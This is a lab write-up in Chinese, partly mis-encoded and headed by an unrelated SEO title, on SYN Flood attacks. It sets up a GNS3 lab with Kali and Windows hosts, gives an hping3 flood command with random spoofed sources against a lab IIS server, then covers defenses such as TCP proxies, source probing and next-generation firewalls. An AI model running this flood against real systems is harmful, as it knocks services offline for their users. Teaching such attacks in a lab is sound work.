手機(jī)網(wǎng)站制作行業(yè)排行前端seo搜索引擎優(yōu)化
一、SYN Flood原理
在TCP三次握手過程中,
- 客戶端發(fā)送一個SYN包給服務(wù)器
- 服務(wù)端接收到SYN包后,會回復(fù)SYN+ACK包給客戶端,然后等待客戶端回復(fù)ACK包。
- 但此時客戶端并不會回復(fù)ACK包,所以服務(wù)端就只能一直等待直到超時。服務(wù)端超時后會重發(fā)SYN+ACK包給客戶端,默認(rèn)會重試5次,而且每次等待的時間都會增加。
服務(wù)器收到客戶端發(fā)來的SYN會建立一個半連接狀態(tài)的Socket,當(dāng)客戶端在一定時間內(nèi)持續(xù)不斷的發(fā)大量的SYN包但不回復(fù)ACK包,就會耗盡服務(wù)端的資源,這就是SYN Flood攻擊。
二、模擬SYN Flood攻擊
1、實(shí)驗(yàn)環(huán)境
kali、Windows10、GNS3
2、網(wǎng)絡(luò)拓?fù)?/h3>
3、實(shí)驗(yàn)配置
- GNS3路由器
R1#conf t
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#int f0/0
R1(config-if)#ip add 192.168.10.254 255.255.255.0
R1(config-if)#no shut
R1(config-if)#exit
R1(config)#int f1/0
R1(config-if)#ip add 192.168.100.254 255.255.255.0
R1(config-if)#no shut
R1(config-if)#
- kali虛擬機(jī)配置網(wǎng)卡eth0
#打開interfaces文件并添加eth0網(wǎng)卡
┌──(root?kali)-[/home/kali]
└─# vim /etc/network/interfaces

R1#conf t
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#int f0/0
R1(config-if)#ip add 192.168.10.254 255.255.255.0
R1(config-if)#no shut
R1(config-if)#exit
R1(config)#int f1/0
R1(config-if)#ip add 192.168.100.254 255.255.255.0
R1(config-if)#no shut
R1(config-if)#
#打開interfaces文件并添加eth0網(wǎng)卡
┌──(root?kali)-[/home/kali]
└─# vim /etc/network/interfaces
- ?啟用網(wǎng)卡并查看IP配置是否成功
┌──(root?kali)-[/home/kali]
└─# ifdown eth0
ifdown: interface eth0 not configured┌──(root?kali)-[/home/kali]
└─# ifup eth0#ifconfig查看上述更改是否生效
┌──(root?kali)-[/home/kali]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 192.168.10.1 netmask 255.255.255.0 broadcast 192.168.10.255inet6 fe80::20c:29ff:fee2:4449 prefixlen 64 scopeid 0x20<link>ether 00:0c:29:e2:44:49 txqueuelen 1000 (Ethernet)RX packets 552 bytes 47915 (46.7 KiB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 51 bytes 7410 (7.2 KiB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536inet 127.0.0.1 netmask 255.0.0.0inet6 ::1 prefixlen 128 scopeid 0x10<host>loop txqueuelen 1000 (Local Loopback)RX packets 18558 bytes 1513808 (1.4 MiB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 18558 bytes 1513808 (1.4 MiB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0#ping測試看網(wǎng)關(guān)是否可達(dá)
┌──(root?kali)-[/home/kali]
└─# ping 192.168.10.254
PING 192.168.10.254 (192.168.10.254) 56(84) bytes of data.
64 bytes from 192.168.10.254: icmp_seq=1 ttl=255 time=44.6 ms
64 bytes from 192.168.10.254: icmp_seq=2 ttl=255 time=25.1 ms
^C
--- 192.168.10.254 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 25.077/34.838/44.599/9.761 ms
- 查看kali路由:?
└─# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.10.254 0.0.0.0 UG 0 0 0 eth0
192.168.10.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
- Windows使用命令配靜態(tài)IP
C:\Windows\system32>netsh interface ip set address "Ethernet0" static 192.168.100.1 255.255.255.0 192.168.100.254
#查看IP是否設(shè)置成功 C:\Windows\system32>ipconfig
#ping測試看網(wǎng)關(guān)是否可達(dá) C:\Windows\system32>ping 192.168.100.254
ping測試 :kali 虛擬機(jī)pingWindows server 2016虛擬機(jī)
4、搭建IIS服務(wù)
- Windows server 2016上面搭建IIS服務(wù)并在本地進(jìn)行訪問
- kali火狐瀏覽器訪問
肉雞:幾十萬臺同時在發(fā)幾十萬個包
DDOS計算的是同時的流量
5、實(shí)施SYN Flood攻擊
- 工具:kali (hping3 )
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.100.1
#-c 發(fā)送 包的數(shù)量
#-d 發(fā)送包的大小
#-S 只發(fā)送SYN的報文
-w 指定Windows窗口大小
#-p 指定目標(biāo)端口80
#--flood
#--rand-source發(fā)請求的時候指定隨機(jī)的IP
#服務(wù)器的IP
- 多開幾個shell進(jìn)行 SYN Flood攻擊:
- ?抓到的ICMP數(shù)據(jù)包
三、如何防御SYN Flood
1、使用TCP代理的方式
客戶機(jī)先和代理服務(wù)器建立TCP連接,代理服務(wù)器收到TCP的ACK后,再將數(shù)據(jù)轉(zhuǎn)發(fā)給服務(wù)器
如果用DDOS服務(wù)器將代理服務(wù)器打掉了,服務(wù)器也不能正常提供服務(wù)了,因?yàn)榉?wù)器是通過代理來提供服務(wù)的。代理:選代理一般使用高性能防火墻。
2、TCP的源探測,探測發(fā)送方
client發(fā)送syn請求,防火墻偽造SYN+ACk報文,如果客戶機(jī)是虛假的源就不會響應(yīng),如果客戶機(jī)是真實(shí)的源,就會發(fā)一個重新建立連接請求的RST報文。防火墻收到RST報文得知客戶機(jī)是真實(shí)的,放通將數(shù)據(jù)傳到服務(wù)器。
知識補(bǔ)充:下一代防火墻NGFW
不同信任級別的網(wǎng)絡(luò)之間的一個線速(wire-speed)實(shí)時防護(hù)設(shè)備,能夠?qū)α髁繄?zhí)行深度檢測,并阻斷攻擊。
- 前向兼容傳統(tǒng)防火墻的功能,包括包過濾、協(xié)議狀態(tài)過濾、NAT和VPN。
- 具備應(yīng)用感知能力,能基于應(yīng)用實(shí)施精細(xì)化的安全管控策略和層次化的帶寬管理手段。
- 支持IPS功能,實(shí)現(xiàn)IPS(入侵防御系統(tǒng))與防火墻的深度融合。
IPS系統(tǒng)是位于防火墻和網(wǎng)絡(luò)的設(shè)備之間的設(shè)備,當(dāng)檢測到攻擊時,IPS會在這種攻擊擴(kuò)散到網(wǎng)絡(luò)其他地方前阻止這個惡意通信。
NGFW可以根據(jù)IPS檢測的惡意流量自動更新下發(fā)安全策略,而不需要管理員介入。 - 利用防火墻以外的信息,增強(qiáng)管控能力
如利用ITit系統(tǒng)提供的用戶信息、位置信息、漏洞和網(wǎng)絡(luò)資源信息等,幫助改進(jìn)和優(yōu)化安全策略。如:通過集成用戶認(rèn)證系統(tǒng),實(shí)現(xiàn)基于用戶的安全策略,以應(yīng)對移動辦公場景下IP地址變化帶來的管控難題。